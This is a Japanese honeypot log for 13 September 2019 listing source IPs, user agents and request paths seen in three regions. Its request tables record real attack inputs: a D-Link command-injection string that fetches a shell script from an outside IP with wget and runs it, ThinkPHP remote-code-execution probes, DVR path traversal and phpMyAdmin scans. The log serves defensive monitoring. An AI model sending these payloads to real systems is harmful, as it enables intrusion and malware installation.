ハニーポット(仮) 観測記録 2019/09/13分です。
特徴
Region:AP
HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
zgrabによるスキャン行為
を確認しました。
Region:US
D-Linkの脆弱性を狙うアクセス
HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Hakaiによる悪意のあるアクセス
を確認しました。
Region:EU
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
を確認しました。
他
アクセス数推移
AP:総アクセス数:83 (前日比:+46)
US:総アクセス数:9 (前日比:-9)
EU:総アクセス数:17 (前日比:+5)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 111.2.184.14 | China |
| 1 | 117.50.47.98 | China |
| 1 | 157.245.9.238 | United States |
| 3 | 172.93.104.162 | United States |
| 3 | 185.235.244.251 | Russia |
| 1 | 193.188.22.56 | Russia |
| 1 | 218.108.29.194 | China |
| 1 | 221.191.47.218 | Japan |
| 1 | 223.68.158.130 | China |
| 55 | 31.128.13.150 | Poland |
| 4 | 39.135.1.157 | China |
| 4 | 49.235.51.123 | China |
| 4 | 51.83.234.53 | France |
| 1 | 54.36.149.26 | France |
| 2 | 83.143.86.62 | Norway |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 3 | - |
| 3 | Go-http-client/1.1 |
| 2 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
| 3 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/) |
| 2 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050512 Red Hat/1.7.8-1.1.3.1 |
| 1 | Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.23) Gecko/20090908 Fedora/1.1.18-1.fc10 SeaMonkey/1.1.18 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 55 | Mozilla/7.0 (compatible; MSIE 8.0; Windows Seven) |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /admin.php | HTTP/1.1 |
| 3 | GET | /dbadmin/ | HTTP/1.1 |
| 3 | GET | /db/ | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.0 |
| 2 | GET | /.git/config | HTTP/1.1 |
| 1 | GET | HTTP/1.1 | HTTP/1.1 |
| 1 | GET | /Lists/admin.php | HTTP/1.1 |
| 3 | GET | /login.cgi | HTTP/1.1 |
| 2 | GET | /LoginPage.do | HTTP/1.1 |
| 1 | GET | ../../mnt/custom/ProductDefinition | HTTP |
| 3 | GET | /myadmin/ | HTTP/1.1 |
| 3 | GET | /MyAdmin/ | HTTP/1.1 |
| 3 | GET | /mysqladmin/ | HTTP/1.1 |
| 3 | GET | /MySQLAdmin/ | HTTP/1.1 |
| 3 | GET | /mysql/ | HTTP/1.1 |
| 3 | GET | /phpAdmin/ | HTTP/1.1 |
| 5 | GET | /phpmyadmin/ | HTTP/1.1 |
| 3 | GET | /phpMyAdmin/ | HTTP/1.1 |
| 3 | GET | /pHpMyAdMiN/ | HTTP/1.1 |
| 3 | GET | /PHPMYADMIN/ | HTTP/1.1 |
| 3 | GET | /pma/ | HTTP/1.1 |
| 3 | GET | /pMA/ | HTTP/1.1 |
| 3 | GET | /PMA/ | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /shell?busybox | HTTP/1.1 |
| 3 | GET | /sql/ | HTTP/1.1 |
| 3 | GET | /SQL/ | HTTP/1.1 |
| 3 | GET | /TP/index.php | HTTP/1.1 |
| 3 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 3 | GET | /TP/public/index.php | HTTP/1.1 |
| 3 | GET | /websql/ | HTTP/1.1 |
| 3 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
| 1 | \x03 |
Region:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 106.13.6.61 | China |
| 1 | 14.186.165.169 | Vietnam |
| 1 | 159.89.20.170 | United States |
| 1 | 193.161.220.23 | Spain |
| 1 | 193.188.22.56 | Russia |
| 1 | 202.137.134.57 | Laos |
| 1 | 86.12.12.95 | United Kingdom |
| 1 | 87.171.184.61 | Germany |
| 1 | 89.245.204.109 | Germany |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 1 | Hakai/2.0 |
| 2 | Mozilla/5.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://142[.]93[.]64[.]50/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | HTTP/1.1 |
| 4 | GET | ../../mnt/custom/ProductDefinition | HTTP |
| 1 | GET | /shell?busybox | HTTP/1.1 |
| 1 | GET | /TEMPORARY_LISTEN_ADDRESSES/WSMAN | HTTP/1.1 |
| 1 | GET | /webadmin/script?command=busybox | HTTP/1.1 |
| 1 | \x03 |
Region:EU
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 159.89.20.170 | United States |
| 1 | 167.99.143.169 | United States |
| 1 | 172.93.104.162 | United States |
| 1 | 185.222.211.18 | United Kingdom |
| 1 | 185.235.244.251 | Russia |
| 1 | 193.188.22.56 | Russia |
| 1 | 41.216.186.89 | South Africa |
| 10 | 94.191.105.218 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 4 | - |
| 1 | Go-http-client/1.1 |
| 1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.0 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 1 | GET | /login.cgi | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /Temporary_Listen_Addresses/SMSSERVICE | HTTP/1.1 |
| 1 | GET | /TEMPORARY_LISTEN_ADDRESSES/WSMAN | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 3 | \x03 |
